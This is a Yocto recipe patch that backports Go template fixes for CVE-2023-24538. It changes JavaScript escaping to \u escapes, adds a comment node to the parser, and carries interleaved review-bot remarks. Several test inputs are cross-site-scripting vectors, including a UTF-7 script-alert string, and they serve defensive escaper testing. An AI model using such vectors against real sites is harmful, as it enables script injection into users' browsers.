+@@ -253,7 +253,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
+ `%20dir%3d%22ltr%22`,
+ `c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
+- `Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
++ `Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
+ // Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is done.
+ `greeting=H%69,&amp;addressee=%28World%29`,
+ `greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
+@@ -268,7 +268,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
+ `%20dir%3d%22ltr%22`,
+ `c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
+- `Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
++ `Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
+ // Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is not done.
+ `greeting=H%69,&addressee=%28World%29`,
+ `greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index e72a9ba..c709660 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -238,7 +238,7 @@ func TestEscape(t *testing.T) {
+ {
+ "jsStr",
+ "<button onclick='alert(&quot;{{.H}}&quot;)'>",
+- `<button onclick='alert(&quot;\x3cHello\x3e&quot;)'>`,
++ `<button onclick='alert(&quot;\u003cHello\u003e&quot;)'>`,
+ },
+ {
+ "badMarshaler",
+@@ -259,7 +259,7 @@ func TestEscape(t *testing.T) {
+ {
+ "jsRe",
+ `<button onclick='alert(/{{"foo+bar"}}/.test(""))'>`,
+- `<button onclick='alert(/foo\x2bbar/.test(""))'>`,
++ `<button onclick='alert(/foo\u002bbar/.test(""))'>`,
+ },
+ {
+ "jsReBlank",
+@@ -825,7 +825,7 @@ func TestEscapeSet(t *testing.T) {
+ "main": `<button onclick="title='{{template "helper"}}'; ...">{{template "helper"}}</button>`,
+ "helper": `{{11}} of {{"<100>"}}`,
+ },
+- `<button onclick="title='11 of \x3c100\x3e'; ...">11 of &lt;100&gt;</button>`,
++ `<button onclick="title='11 of \u003c100\u003e'; ...">11 of &lt;100&gt;</button>`,
+ },
+ // A non-recursive template that ends in a different context.
+ // helper starts in jsCtxRegexp and ends in jsCtxDivOp.
+diff --git a/src/html/template/example_test.go b/src/html/template/example_test.go
+index 9d965f1..6cf936f 100644
+--- a/src/html/template/example_test.go
++++ b/src/html/template/example_test.go
+@@ -116,9 +116,9 @@ func Example_escape() {
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34;32&lt;tasty@example.com&gt;
+- // \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
+- // \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
+- // \"Fran \x26 Freddie\'s Diner\"32\x3Ctasty@example.com\x3E
++ // \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
++ // \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
++ // \"Fran \u0026 Freddie\'s Diner\"32\u003Ctasty@example.com\u003E
+ // %22Fran+%26+Freddie%27s+Diner%2232%3Ctasty%40example.com%3E
+
+ }
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index 0e91458..ea9c183 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -163,7 +163,6 @@ func jsValEscaper(args ...interface{}) string {
+ }
+ // TODO: detect cycles before calling Marshal which loops infinitely on
+ // cyclic data. This may be an unacceptable DoS risk.
+-
+ b, err := json.Marshal(a)
+ if err != nil {
+ // Put a space before comment so that if it is flush against
+@@ -178,8 +177,8 @@ func jsValEscaper(args ...interface{}) string {
+ // TODO: maybe post-process output to prevent it from containing
+ // "<!--", "-->", "<![CDATA[", "]]>", or "</script"
+ // in case custom marshalers produce output containing those.
+-
+- // TODO: Maybe abbreviate \u00ab to \xab to produce more compact output.
++ // Note: Do not use \x escaping to save bytes because it is not JSON compatible and this escaper
++ // supports ld+json content-type.
+ if len(b) == 0 {
+ // In, `x=y/{{.}}*z` a json.Marshaler that produces "" should
+ // not cause the output `x=y/*z`.
+@@ -260,6 +259,8 @@ func replace(s string, replacementTable []string) string {
+ r, w = utf8.DecodeRuneInString(s[i:])
+ var repl string
+ switch {
++ case int(r) < len(lowUnicodeReplacementTable):
++ repl = lowUnicodeReplacementTable[r]
+ case int(r) < len(replacementTable) && replacementTable[r] != "":
+ repl = replacementTable[r]
+ case r == '\u2028':
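Review bot: The new first `case` shadows every control-character row of the table passed in, because `lowUnicodeReplacementTable` is populated for all of 0x00–0x1f and is tested before `replacementTable[r]`. The `0`, `'\t'`, `'\n'`, `'\v'`, `'\f'` and `'\r'` rows kept in `jsStrReplacementTable`, `jsStrNormReplacementTable` and `jsRegexpReplacementTable` (next hunk) can therefore no longer be selected; they agree with the low table today, but a later edit to one of them would silently have no effect. I would state the precedence at the case, e.g. `// Control characters (r < 0x20) are always escaped from lowUnicodeReplacementTable; the per-context table applies only from 0x20 up.` The body of `replace` starts and ends outside this hunk.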
+@@ -283,67 +284,80 @@ func replace(s string, replacementTable []string) string {
+ return b.String()
+ }
+
++var lowUnicodeReplacementTable = []string{
++ 0: `\u0000`, 1: `\u0001`, 2: `\u0002`, 3: `\u0003`, 4: `\u0004`, 5: `\u0005`, 6: `\u0006`,
++ '\a': `\u0007`,
++ '\b': `\u0008`,
++ '\t': `\t`,
++ '\n': `\n`,
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
++ '\f': `\f`,
++ '\r': `\r`,
++ 0xe: `\u000e`, 0xf: `\u000f`, 0x10: `\u0010`, 0x11: `\u0011`, 0x12: `\u0012`, 0x13: `\u0013`,
++ 0x14: `\u0014`, 0x15: `\u0015`, 0x16: `\u0016`, 0x17: `\u0017`, 0x18: `\u0018`, 0x19: `\u0019`,
++ 0x1a: `\u001a`, 0x1b: `\u001b`, 0x1c: `\u001c`, 0x1d: `\u001d`, 0x1e: `\u001e`, 0x1f: `\u001f`,
++}
++
+ var jsStrReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
+- '&': `\x26`,
+- '\'': `\x27`,
+- '+': `\x2b`,
++ '"': `\u0022`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
++ '+': `\u002b`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ '\\': `\\`,
+ }
+
+ // jsStrNormReplacementTable is like jsStrReplacementTable but does not
+ // overencode existing escapes since this table has no entry for `\`.
+ var jsStrNormReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
+- '&': `\x26`,
+- '\'': `\x27`,
+- '+': `\x2b`,
++ '"': `\u0022`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
++ '+': `\u002b`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ }
+-
+ var jsRegexpReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
++ '"': `\u0022`,
+ '$': `\$`,
+- '&': `\x26`,
+- '\'': `\x27`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
+ '(': `\(`,
+ ')': `\)`,
+ '*': `\*`,
+- '+': `\x2b`,
++ '+': `\u002b`,
+ '-': `\-`,
+ '.': `\.`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ '?': `\?`,
+ '[': `\[`,
+ '\\': `\\`,
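Review bot: `lowUnicodeReplacementTable` is added without a doc comment, and the context comment `Encode HTML specials as hex` above the `'"'` rows no longer describes the `\uXXXX` values this hunk writes there. I would add `// lowUnicodeReplacementTable maps U+0000–U+001F to escapes that are valid in both JS and JSON string literals.` above the new table and reword the three context comments to `// Encode HTML specials as \uXXXX escapes so the output can be embedded`. The hunk also deletes the blank line that separated `jsStrNormReplacementTable` from `var jsRegexpReplacementTable`, which is worth keeping for readability. The hunk ends inside `jsRegexpReplacementTable`, whose remaining rows are not visible here.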
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index 075adaa..d7ee47b 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -137,7 +137,7 @@ func TestJSValEscaper(t *testing.T) {
+ {"foo", `"foo"`},
+ // Newlines.
+ {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
+- // "\v" == "v" on IE 6 so use "\x0b" instead.
++ // "\v" == "v" on IE 6 so use "\u000b" instead.
+ {"\t\x0b", `"\t\u000b"`},
+ {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
+ {[]interface{}{}, "[]"},
+@@ -173,7 +173,7 @@ func TestJSStrEscaper(t *testing.T) {
+ }{
+ {"", ``},
+ {"foo", `foo`},
+- {"\u0000", `\0`},
++ {"\u0000", `\u0000`},
+ {"\t", `\t`},
+ {"\n", `\n`},
+ {"\r", `\r`},
+@@ -183,14 +183,14 @@ func TestJSStrEscaper(t *testing.T) {
+ {"\\n", `\\n`},
+ {"foo\r\nbar", `foo\r\nbar`},
+ // Preserve attribute boundaries.
+- {`"`, `\x22`},
+- {`'`, `\x27`},
++ {`"`, `\u0022`},
++ {`'`, `\u0027`},
+ // Allow embedding in HTML without further escaping.
+- {`&amp;`, `\x26amp;`},
++ {`&amp;`, `\u0026amp;`},
+ // Prevent breaking out of text node and element boundaries.
+- {"</script>", `\x3c\/script\x3e`},
+- {"<![CDATA[", `\x3c![CDATA[`},
+- {"]]>", `]]\x3e`},
++ {"</script>", `\u003c\/script\u003e`},
++ {"<![CDATA[", `\u003c![CDATA[`},
++ {"]]>", `]]\u003e`},
+ // https://dev.w3.org/html5/markup/aria/syntax.html#escaping-text-span
+ // "The text in style, script, title, and textarea elements
+ // must not have an escaping text span start that is not
+@@ -201,11 +201,11 @@ func TestJSStrEscaper(t *testing.T) {
+ // allow regular text content to be interpreted as script
+ // allowing script execution via a combination of a JS string
+ // injection followed by an HTML text injection.
+- {"<!--", `\x3c!--`},
+- {"-->", `--\x3e`},
++ {"<!--", `\u003c!--`},
++ {"-->", `--\u003e`},
+ // From https://code.google.com/p/doctype/wiki/ArticleUtf7
+ {"+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
+- `\x2bADw-script\x2bAD4-alert(1)\x2bADw-\/script\x2bAD4-`,
++ `\u002bADw-script\u002bAD4-alert(1)\u002bADw-\/script\u002bAD4-`,
+ },
+ // Invalid UTF-8 sequence
+ {"foo\xA0bar", "foo\xA0bar"},
+@@ -228,7 +228,7 @@ func TestJSRegexpEscaper(t *testing.T) {
+ }{
+ {"", `(?:)`},
+ {"foo", `foo`},
+- {"\u0000", `\0`},
++ {"\u0000", `\u0000`},
+ {"\t", `\t`},
+ {"\n", `\n`},
+ {"\r", `\r`},
+@@ -238,19 +238,19 @@ func TestJSRegexpEscaper(t *testing.T) {
+ {"\\n", `\\n`},
+ {"foo\r\nbar", `foo\r\nbar`},
+ // Preserve attribute boundaries.
+- {`"`, `\x22`},
+- {`'`, `\x27`},
++ {`"`, `\u0022`},
++ {`'`, `\u0027`},
+ // Allow embedding in HTML without further escaping.
+- {`&amp;`, `\x26amp;`},
++ {`&amp;`, `\u0026amp;`},
+ // Prevent breaking out of text node and element boundaries.
+- {"</script>", `\x3c\/script\x3e`},
+- {"<![CDATA[", `\x3c!\[CDATA\[`},
+- {"]]>", `\]\]\x3e`},
++ {"</script>", `\u003c\/script\u003e`},
++ {"<![CDATA[", `\u003c!\[CDATA\[`},
++ {"]]>", `\]\]\u003e`},
+ // Escaping text spans.
+- {"<!--", `\x3c!\-\-`},
+- {"-->", `\-\-\x3e`},
++ {"<!--", `\u003c!\-\-`},
++ {"-->", `\-\-\u003e`},
+ {"*", `\*`},
+- {"+", `\x2b`},
++ {"+", `\u002b`},
+ {"?", `\?`},
+ {"[](){}", `\[\]\(\)\{\}`},
+ {"$foo|x.y", `\$foo\|x\.y`},
+@@ -284,27 +284,27 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
+ {
+ "jsStrEscaper",
+ jsStrEscaper,
+- "\\0\x01\x02\x03\x04\x05\x06\x07" +
+- "\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
+- "\x10\x11\x12\x13\x14\x15\x16\x17" +
+- "\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
+- ` !\x22#$%\x26\x27()*\x2b,-.\/` +
+- `0123456789:;\x3c=\x3e?` +
++ `\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
++ `\u0008\t\n\u000b\f\r\u000e\u000f` +
++ `\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
++ `\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
++ ` !\u0022#$%\u0026\u0027()*\u002b,-.\/` +
++ `0123456789:;\u003c=\u003e?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ[\\]^_` +
+ "`abcdefghijklmno" +
+- "pqrstuvwxyz{|}~\x7f" +
++ "pqrstuvwxyz{|}~\u007f" +
+ "\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
+ },
+ {
+ "jsRegexpEscaper",
+ jsRegexpEscaper,
+- "\\0\x01\x02\x03\x04\x05\x06\x07" +
+- "\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
+- "\x10\x11\x12\x13\x14\x15\x16\x17" +
+- "\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
+- ` !\x22#\$%\x26\x27\(\)\*\x2b,\-\.\/` +
+- `0123456789:;\x3c=\x3e\?` +
++ `\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
++ `\u0008\t\n\u000b\f\r\u000e\u000f` +
++ `\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
++ `\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
++ ` !\u0022#\$%\u0026\u0027\(\)\*\u002b,\-\.\/` +
++ `0123456789:;\u003c=\u003e\?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ\[\\\]\^_` +
+ "`abcdefghijklmno" +
+diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
+index 13e6ba4..86bd4db 100644
+--- a/src/html/template/template_test.go
++++ b/src/html/template/template_test.go
+@@ -6,6 +6,7 @@ package template_test
+
+ import (
+ "bytes"
++ "encoding/json"
+ . "html/template"
+ "strings"
+ "testing"
+@@ -121,6 +122,44 @@ func TestNumbers(t *testing.T) {
+ c.mustExecute(c.root, nil, "12.34 7.5")
+ }
+
++func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
++ // See #33671 and #37634 for more context on this.
++ tests := []struct{ name, in string }{
++ {"empty", ""},
++ {"invalid", string(rune(-1))},
++ {"null", "\u0000"},
++ {"unit separator", "\u001F"},
++ {"tab", "\t"},
++ {"gt and lt", "<>"},
++ {"quotes", `'"`},
++ {"ASCII letters", "ASCII letters"},
++ {"Unicode", "ʕ⊙ϖ⊙ʔ"},
++ {"Pizza", "P"},
++ }
++ const (
++ prefix = `<script type="application/ld+json">`
++ suffix = `</script>`
++ templ = prefix + `"{{.}}"` + suffix
++ )
++ tpl := Must(New("JS string is JSON string").Parse(templ))
++ for _, tt := range tests {
++ t.Run(tt.name, func(t *testing.T) {
++ var buf bytes.Buffer
++ if err := tpl.Execute(&buf, tt.in); err != nil {
++ t.Fatalf("Cannot render template: %v", err)
++ }
++ trimmed := bytes.TrimSuffix(bytes.TrimPrefix(buf.Bytes(), []byte(prefix)), []byte(suffix))
++ var got string
++ if err := json.Unmarshal(trimmed, &got); err != nil {
++ t.Fatalf("Cannot parse JS string %q as JSON: %v", trimmed[1:len(trimmed)-1], err)
++ }
++ if got != tt.in {
++ t.Errorf("Serialization changed the string value: got %q want %q", got, tt.in)
++ }
++ })
++ }
++}
++
+ type testCase struct {
+ t *testing.T
+ root *Template
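Review bot: The `Pizza` case passes the ASCII string `"P"`, which exercises nothing the `ASCII letters` case does not; from its name the input was presumably a character outside the Basic Multilingual Plane that was lost when the patch text was re-encoded. That would be the one input in this table checking that a 4-byte UTF-8 sequence survives the escaper and `json.Unmarshal`, so I would restore it in escaped form, `{"Pizza", "\U0001F355"},`, which also keeps the patch file ASCII-safe. The `Yukihiro says` context line in the `src/text/template/exec_test.go` hunk of this patch shows similarly damaged bytes. If that is what the file contains rather than an artefact of how this page was rendered, check that the hunk still applies to the Go 1.14 tree without fuzz.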
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index 77294ed..b8a809e 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -911,9 +911,9 @@ func TestJSEscaping(t *testing.T) {
+ {`Go "jump" \`, `Go \"jump\" \\`},
+ {`Yukihiro says "今日ã¯ä¸–ç•Œ"`, `Yukihiro says \"今日ã¯ä¸–ç•Œ\"`},
+ {"unprintable \uFDFF", `unprintable \uFDFF`},
+- {`<html>`, `\x3Chtml\x3E`},
+- {`no = in attributes`, `no \x3D in attributes`},
+- {`&#x27; does not become HTML entity`, `\x26#x27; does not become HTML entity`},
++ {`<html>`, `\u003Chtml\u003E`},
++ {`no = in attributes`, `no \u003D in attributes`},
++ {`&#x27; does not become HTML entity`, `\u0026#x27; does not become HTML entity`},
+ }
+ for _, tc := range testCases {
+ s := JSEscapeString(tc.in)
+diff --git a/src/text/template/funcs.go b/src/text/template/funcs.go
+index 46125bc..f3de9fb 100644
+--- a/src/text/template/funcs.go
++++ b/src/text/template/funcs.go
+@@ -640,10 +640,10 @@ var (
+ jsBackslash = []byte(`\\`)
+ jsApos = []byte(`\'`)
+ jsQuot = []byte(`\"`)
+- jsLt = []byte(`\x3C`)
+- jsGt = []byte(`\x3E`)
+- jsAmp = []byte(`\x26`)
+- jsEq = []byte(`\x3D`)
++ jsLt = []byte(`\u003C`)
++ jsGt = []byte(`\u003E`)
++ jsAmp = []byte(`\u0026`)
++ jsEq = []byte(`\u003D`)
+ )
+
+ // JSEscape writes to w the escaped JavaScript equivalent of the plain text data b.
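Review bot: `jsApos` is left as `\'`, which JSON does not accept as an escape, so output that uses it is still not guaranteed to parse as JSON even though the subject line of this patch lists text/template under "JSON compatibility". I would not change the value in a backport, but I would say so on that line, e.g. `// \' is valid in a JS string literal but not in JSON`, so callers do not treat `JSEscape` output as JSON-safe. The new values also use upper-case hex digits (`\u003C`) where `src/html/template/js.go` in this patch uses lower case (`\u003c`); both are equivalent to a parser, but tests and log matching that compare strings need to know which one to expect. The `var (` block begins above this hunk, and where `jsApos` is emitted is not visible here.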
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
new file mode 100644
index 0000000000..cd7dd0957c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
@@ -0,0 +1,393 @@
+From 7ddce23c7d5b728acf8482f5006497c7b9915f8a Mon Sep 17 00:00:00 2001
+From: Ariel Mashraki <ariel@mashraki.co.il>
+Date: Wed, 22 Apr 2020 22:17:56 +0300
+Subject: [PATCH 3/6] text/template: add CommentNode to template parse tree
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Fixes #34652
+
+Change-Id: Icf6e3eda593fed826736f34f95a9d66f5450cc98
+Reviewed-on: https://go-review.googlesource.com/c/go/+/229398
+Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
+Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+
+Dependency Patch #3
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/c8ea03828b0645b1fd5725888e44873b75fcfbb6
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ api/next.txt | 19 +++++++++++++++++++
+ src/html/template/escape.go | 2 ++
+ src/html/template/template_test.go | 16 ++++++++++++++++
+ src/text/template/exec.go | 1 +
+ src/text/template/parse/lex.go | 8 +++++++-
+ src/text/template/parse/lex_test.go | 7 +++++--
+ src/text/template/parse/node.go | 33 +++++++++++++++++++++++++++++++++
+ src/text/template/parse/parse.go | 22 +++++++++++++++++++---
+ src/text/template/parse/parse_test.go | 25 +++++++++++++++++++++++++
+ 9 files changed, 127 insertions(+), 6 deletions(-)
+
+diff --git a/api/next.txt b/api/next.txt
+index e69de29..076f39e 100644
+--- a/api/next.txt
++++ b/api/next.txt
+@@ -0,0 +1,19 @@
++pkg unicode, const Version = "13.0.0"
++pkg unicode, var Chorasmian *RangeTable
++pkg unicode, var Dives_Akuru *RangeTable
++pkg unicode, var Khitan_Small_Script *RangeTable
++pkg unicode, var Yezidi *RangeTable
++pkg text/template/parse, const NodeComment = 20
++pkg text/template/parse, const NodeComment NodeType
++pkg text/template/parse, const ParseComments = 1
++pkg text/template/parse, const ParseComments Mode
++pkg text/template/parse, method (*CommentNode) Copy() Node
++pkg text/template/parse, method (*CommentNode) String() string
++pkg text/template/parse, method (CommentNode) Position() Pos
++pkg text/template/parse, method (CommentNode) Type() NodeType
++pkg text/template/parse, type CommentNode struct
++pkg text/template/parse, type CommentNode struct, Text string
++pkg text/template/parse, type CommentNode struct, embedded NodeType
++pkg text/template/parse, type CommentNode struct, embedded Pos
++pkg text/template/parse, type Mode uint
++pkg text/template/parse, type Tree struct, Mode Mode
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index f12dafa..8739735 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -124,6 +124,8 @@ func (e *escaper) escape(c context, n parse.Node) context {
+ switch n := n.(type) {
+ case *parse.ActionNode:
+ return e.escapeAction(c, n)
++ case *parse.CommentNode:
++ return c
+ case *parse.IfNode:
+ return e.escapeBranch(c, &n.BranchNode, "if")
+ case *parse.ListNode:
+diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
+index 86bd4db..1f2c888 100644
+--- a/src/html/template/template_test.go
++++ b/src/html/template/template_test.go
+@@ -10,6 +10,7 @@ import (
+ . "html/template"
+ "strings"
+ "testing"
++ "text/template/parse"
+ )
+
+ func TestTemplateClone(t *testing.T) {
+@@ -160,6 +161,21 @@ func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
+ }
+ }
+
++func TestSkipEscapeComments(t *testing.T) {
++ c := newTestCase(t)
++ tr := parse.New("root")
++ tr.Mode = parse.ParseComments
++ newT, err := tr.Parse("{{/* A comment */}}{{ 1 }}{{/* Another comment */}}", "", "", make(map[string]*parse.Tree))
++ if err != nil {
++ t.Fatalf("Cannot parse template text: %v", err)
++ }
++ c.root, err = c.root.AddParseTree("root", newT)
++ if err != nil {
++ t.Fatalf("Cannot add parse tree to template: %v", err)
++ }
++ c.mustExecute(c.root, nil, "1")
++}
++
+ type testCase struct {
+ t *testing.T
+ root *Template
+diff --git a/src/text/template/exec.go b/src/text/template/exec.go
+index ac3e741..7ac5175 100644
+--- a/src/text/template/exec.go
++++ b/src/text/template/exec.go
+@@ -256,6 +256,7 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
+ if len(node.Pipe.Decl) == 0 {
+ s.printValue(node, val)
+ }
++ case *parse.CommentNode:
+ case *parse.IfNode:
+ s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
+ case *parse.ListNode:
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index 30371f2..e41373a 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -41,6 +41,7 @@ const (
+ itemBool // boolean constant
+ itemChar // printable ASCII character; grab bag for comma etc.
+ itemCharConstant // character constant
++ itemComment // comment text
+ itemComplex // complex constant (1+2i); imaginary is just a number
+ itemAssign // equals ('=') introducing an assignment
+ itemDeclare // colon-equals (':=') introducing a declaration
+@@ -112,6 +113,7 @@ type lexer struct {
+ leftDelim string // start of action
+ rightDelim string // end of action
+ trimRightDelim string // end of action with trim marker
++ emitComment bool // emit itemComment tokens.
+ pos Pos // current position in the input
+ start Pos // start position of this item
+ width Pos // width of last rune read from input
+@@ -203,7 +205,7 @@ func (l *lexer) drain() {
+ }
+
+ // lex creates a new scanner for the input string.
+-func lex(name, input, left, right string) *lexer {
++func lex(name, input, left, right string, emitComment bool) *lexer {
+ if left == "" {
+ left = leftDelim
+ }
+@@ -216,6 +218,7 @@ func lex(name, input, left, right string) *lexer {
+ leftDelim: left,
+ rightDelim: right,
+ trimRightDelim: rightTrimMarker + right,
++ emitComment: emitComment,
+ items: make(chan item),
+ line: 1,
+ startLine: 1,
+@@ -323,6 +326,9 @@ func lexComment(l *lexer) stateFn {
+ if !delim {
+ return l.errorf("comment ends before closing delimiter")
+ }
++ if l.emitComment {
++ l.emit(itemComment)
++ }
+ if trimSpace {
+ l.pos += trimMarkerLen
+ }
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index 563c4fc..f6d5f28 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -15,6 +15,7 @@ var itemName = map[itemType]string{
+ itemBool: "bool",
+ itemChar: "char",
+ itemCharConstant: "charconst",
++ itemComment: "comment",
+ itemComplex: "complex",
+ itemDeclare: ":=",
+ itemEOF: "EOF",
+@@ -90,6 +91,7 @@ var lexTests = []lexTest{
+ {"text", `now is the time`, []item{mkItem(itemText, "now is the time"), tEOF}},
+ {"text with comment", "hello-{{/* this is a comment */}}-world", []item{
+ mkItem(itemText, "hello-"),
++ mkItem(itemComment, "/* this is a comment */"),
+ mkItem(itemText, "-world"),
+ tEOF,
+ }},
+@@ -311,6 +313,7 @@ var lexTests = []lexTest{
+ }},
+ {"trimming spaces before and after comment", "hello- {{- /* hello */ -}} -world", []item{
+ mkItem(itemText, "hello-"),
++ mkItem(itemComment, "/* hello */"),
+ mkItem(itemText, "-world"),
+ tEOF,
+ }},
+@@ -389,7 +392,7 @@ var lexTests = []lexTest{
+
+ // collect gathers the emitted items into a slice.
+ func collect(t *lexTest, left, right string) (items []item) {
+- l := lex(t.name, t.input, left, right)
++ l := lex(t.name, t.input, left, right, true)
+ for {
+ item := l.nextItem()
+ items = append(items, item)
+@@ -529,7 +532,7 @@ func TestPos(t *testing.T) {
+ func TestShutdown(t *testing.T) {
+ // We need to duplicate template.Parse here to hold on to the lexer.
+ const text = "erroneous{{define}}{{else}}1234"
+- lexer := lex("foo", text, "{{", "}}")
++ lexer := lex("foo", text, "{{", "}}", false)
+ _, err := New("root").parseLexer(lexer)
+ if err == nil {
+ t.Fatalf("expected error")
+diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
+index 1c116ea..a9dad5e 100644
+--- a/src/text/template/parse/node.go
++++ b/src/text/template/parse/node.go
+@@ -70,6 +70,7 @@ const (
+ NodeTemplate // A template invocation action.
+ NodeVariable // A $ variable.
+ NodeWith // A with action.
++ NodeComment // A comment.
+ )
+
+ // Nodes.
+@@ -149,6 +150,38 @@ func (t *TextNode) Copy() Node {
+ return &TextNode{tr: t.tr, NodeType: NodeText, Pos: t.Pos, Text: append([]byte{}, t.Text...)}
+ }
+
++// CommentNode holds a comment.
++type CommentNode struct {
++ NodeType
++ Pos
++ tr *Tree
++ Text string // Comment text.
++}
++
++func (t *Tree) newComment(pos Pos, text string) *CommentNode {
++ return &CommentNode{tr: t, NodeType: NodeComment, Pos: pos, Text: text}
++}
++
++func (c *CommentNode) String() string {
++ var sb strings.Builder
++ c.writeTo(&sb)
++ return sb.String()
++}
++
++func (c *CommentNode) writeTo(sb *strings.Builder) {
++ sb.WriteString("{{")
++ sb.WriteString(c.Text)
++ sb.WriteString("}}")
++}
++
++func (c *CommentNode) tree() *Tree {
++ return c.tr
++}
++
++func (c *CommentNode) Copy() Node {
++ return &CommentNode{tr: c.tr, NodeType: NodeComment, Pos: c.Pos, Text: c.Text}
++}
++
+ // PipeNode holds a pipeline with optional declaration
+ type PipeNode struct {
+ NodeType
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
